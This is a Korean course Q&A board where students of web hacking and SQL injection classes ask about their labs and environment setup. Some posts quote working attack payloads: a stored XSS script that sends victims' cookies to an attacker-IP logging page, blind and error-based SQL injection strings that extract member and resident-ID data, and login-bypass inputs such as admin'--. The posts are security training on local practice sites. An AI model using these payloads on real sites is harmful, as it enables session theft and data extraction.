묻고 답해요
158만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
세션 하이재킹 질문
127.0.0.1/session/session.php?session=test이것으로 rawdata.txt에날짜와 시간/ip주소/test는 잘 출력이 되었습니다.다른 웹브라우저에서 공격자id로 접속해서 다음과 같이 게시판을 작성하였으며 그때 ip주소를 어떻게 할당받는지가 궁금합니다.<script>location.href = "http://공격자ip/session/session.php?session=" + document.cookie</script>이 게시판의 내용은 rawdata.txt에 저장되지 않습니다.무엇이 잘못되었을까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습 2-9] request 수정하고 send를 눌렀는데 검색이 되지 않습니다.
GET /insecure_website/index.php?page=view&idx=14%20and%20length((select+jumin+customer_info+where+id='admin'))=14그 이전까지는 잘되었는데 이부분 부터 계속 안됩니다. 어디가 문제일까요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
업데이트 부탁드립니다.
안된다고 하시는 분들이 지금 너무 많습니다 저역시 2주 동안따라해봐도 환경 구성이 되질 않습니다. 지금 따라 하려니깐 되질 않습니다 다운이 받아 지지않는 버전도 있구요 그래서 xampp로 오라클연동하는 방법들을 알려주세요 업로드 해주셔도 감사할것같습니다
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
CSRF 공격시 hidden 필드로 csrf 토큰도 넣어주면 가능하지 않을까요?
공격 스크립트에 CSRF 토큰도 필드로 입력시켜주면 안될까요.?그러면 세션에 유저의 CSRF 토큰값은 유지되고 파라미터로 넘길 CSRF 토큰도 유저의 토큰이어서 비교했을 때 같지 않을까요? 여기서 전제 조건은 유저의 CSRF토큰을 받을 수 있다는 건데 이건.. 어떻게 알 수 있을지 모르겠지만 안다고 가정하면? 될거 같다는 생각이 들었습니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
파일 업로드에 실패하셨습니다.
코드를 하나도 고치지 않고 바로 실습을 하는데도 불구하고 파일이 업로드되지 않습니다.다른 분들이 올린 질문도 참고해서 봤는데 저는 나중에 강의를 들어서 그런지 이미 코드가 고쳐져있는 상태더라고요. 강의와 같이 png 파일을 업로드하려고 했는데도 파일 업로드를 실패하셨습니다. 하는 팝업창만 계속 뜨고 게시글이 올라가지 않습니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
버프스위트 response 수정
request의 쿠키 부분 지우고 send 한 다음response의 set-cookie 옆 세션을 user 쿠키로 수정하려고 하는데 경고음만 울리고 수정이 안 됩니다어떻게 해야 응답의 세션 부분 수정이 가능할까요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
설정한 url 에 대한 인터셉트가 되지 않습니다.
저렇게 설정해도 127.0.0.1 에 대한 요청을 받지 못합니다.네트워크의 프록시 설정도 했습니다.원인이 무엇인지 모르겠습니다ㅠCA 인증서가 없기는 한데, 그렇다고 하더라도 인터셉트는 되어야 하는거 아닌지 싶네요
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
강의 환경설정 MSSQL 문제
안녕하세요오늘 강의 처음 구매해서 지금 4시간 5시간?이 넘게 MSSQL 환경설정과 싸움중입니다.. 질문 게시판에 올라온 MSSQL 관련 솔루션 다 찾아가면서 해보는데도 도저히 해결이 안됩니다.원래 맥 운영체제를 주로 쓰는데 이 강의 때문에 퇴근하고 집에 오자마자 윈도우 노트북도 오랜만에 켜서 하는데 강의도 못듣고 환경설정에 이렇게 시간을 쓰다가 진도도 나가질 못하고 이러고 있으니 진짜 화나고 답답하네요
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
netcat 다운로드가 불가능합니다.
다운로드를 받으려고 하는데 영상처럼은 되지 않고 바이러스가 감지된다고 합니다. 다른 컴퓨터로도 시도해봤으나 바이러스가 감지돼서 다운로드를 막네요...원래 이렇게 돼있는 건가요? 아니면 지금 문제가 있는 걸까요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
로컬 위치를 찾는 법
강의에서 보면 Mysql을 사용하는 DBMS서버가 물리적으로 WAS와 같은 서버에서 가동 중일 때 Mysql의 함수인 Load_flie 을 통해 로컬 파일의 내용을 확인하는 것을 보았습니다. 해당 강의를 보다 궁금한 사항이 생겨 질문 드립니다. 1. 로컬 파일의 위치(경로)를 해커의 입장에서 어떻게 찾는 건가요?해당 서비스가 Window인지 Linux인지는 어떻게 찾나요?
-
해결됨모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
In-line Query 와 Terminating Query
다름이 아니라 취약점 분석 방법론에서 In-line Query 와 Terminating Query 에 대해 설명해주실 때,In-line Query 에서는SELECT * FROM member WHERE user_id = 'hacker' and 1=1 and '1'='1'Terminating Query 에서는 SELECT * FROM member WHERE user_id = 'hacker' and 1=1--'이렇게 말씀해주셨는데요. Q.제가 이해하기로는 In-line 에서 'hacker' 의 앞의 싱글쿼터로 시작했기 때문에 마지막을 싱글쿼터로 맞춰주셨다고 했는데요. 왜 맞춰줘야하나요??Q. In-line 에서는 위와 같이 똑같이 'hacker' 가 있어 앞에가 싱글 쿼터로 똑같이 시작되는데 왜 싱글쿼터로 마무리를 안해도되는지 궁금합니다.
-
미해결모의해킹 실무자가 알려주는, SQL Injection 고급 공격 기법 : PART 2
그룹핑 데이터 조회 관련 공격 질문
안녕하세요 크리핵티브님 강의 정말 잘 듣고 있습니다다름이 아니라 궁금한 게 하나 있는데요 Session5. 그룹핑을 활용한 효과적인 데이터 조회 공격 기법에서 MySQL의 Error Based 공격을 혼자 실습 진행했습니다.[페이로드]/mysql/view.php?idx=extractvalue(1,concat(0x01,(select group_concat(id,'###') from board.members))) 페이로드는 위와 같으며 요청 시 ID 컬럼에 대한 조회는 정상적으로 나오는데 다른 환경에 비해 완전한 출력이 아니라 부분적으로 출력이 되는 것 같습니다. 이런 경우에는 순차적 레코드를 이용한 출력 방법밖에 없거나 다른 방안이 있는지 궁금합니다
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
APMSetup monitor가 켜지지 않습니다.
php.ini에서 magic_quote_gpc를 on에서 off로 바꾸고 다시 실행하려고 하는데, 첫 번째 방법으로 시작되는 모니터 화면이 켜지지 않습니다. 바탕 화면에 APMSETUP Monitor가 깔려서 아무리 눌러도 화면에 나타나지 않습니다. 두번째 방법으로 시도해보았는데 마찬가지로 이런 error 창이 뜨면서 실행되지 않습니다. 127.0.0.1을 url로 입력했을 때 강의 화면처럼 잘 설치되었다고 정상적으로 잘 작동됩니다.어떻게 해야 할까요..?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
Prepared Statement 대응방안 궁금사항 질문있습니다!
Session 10 . 대응방안에서 실습[9-1] Prepared Statement 취약한 소스코드와 안전한 소스코드 강의 10분 49초 부분에서 궁금 사항이 있습니다. 만약 num 파라미터 값을 Integer num = Integer.parseInt(request.getParameter("num"))Integer 형 변환하여 처리하였으나, String sql = "SELECT * FROM ex_member WHERE num = " + num; SQL 구문 자체는 Prepared Statement를 적용하지 않았을 때 이 부분도 취약한걸까요? 결국 인젝션 공격을 위해 문자열은 들어갈 수 밖에 없을 것 같은데 형 변환에서 모두 에러 발생되므로 공격이 불가할 것 같은데 맞을까요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
게시판에서 oracle만 오류가 나는 이유를 모르겠어요
영상처럼 정상적으로 했는데오라클만 이렇게 나오고 있어요DBeaver에서 오라클은 localhost로 하면 오류가 떠서 현재 제 컴퓨터 ip로 만들었습니다
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
인덱스 화면 에러 출력
원래 APMsetup으로 취약한 홈페이지 올려서 실습하다가 XAMPP로 재설치하였습니다.그런데 기본적인 설정을 다 하고 나니 list.php에서 못 보던 에러가 뜨는데 혹시 무엇이 문제인지 알수 있을까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
접근이 거부되었다 에러
실습을 잘하고 있었는데 갑자기 로그인 페이지에서 로그인하면 에러가 발생하여 다시 insecure_website를 다운하여 실습을 진행하려 하는데 insecure_website폴더를 htdocs폴더 안에 넣었고 common.php에서 패스워드도 설정하고 query.txt의 내용을 복사하여 MYSQL에 작성도 했는데 접근이 거부되었다고 나옵니다. 전에는 잘 되었는데 다시 다운받아서 하니 되지 않는데 어떻게 해야 하나요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
질문
members 랑 tb_board 는 언제 만든거에요? ㅋㅋㅋㅋ
-
해결됨모의해킹 실무자가 알려주는, SQL Injection 고급 공격 기법 : PART 2
SQL 인젝션 part3는 언제 나올까요 ?
자동화 도구 제작 관련해서 지식이 전무하기에 너무 공부하고싶습니다.언제쯤 나올 수 있는지 대략적으로라도 알려주실 수 있으신가요 ?
-
해결됨모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
쿼리 결과 오류
코드는 이렇습니다중간에 echo는 제가 찍어본 것이고admin'-- 이렇게 입력하면query : 'select * from member where id='admin'--' and pw='b59c67bf196a4758191e42f76670ceba''쿼리는 이렇게 찍히는데 Fatal error: Call to a member function fetch_assoc() on a non-object in <b>C:\APM_Setup\htdocs\login\loginAction.php 결과값이 없다고 오류가 나버립니다.mysql에서 직접 admin'-- 이렇게 넣어봐도 잘 나오는데... 뭐가 문제일까요? +강의 뒷부분의 'or1=1-- 도 넣으면 에러납니다.
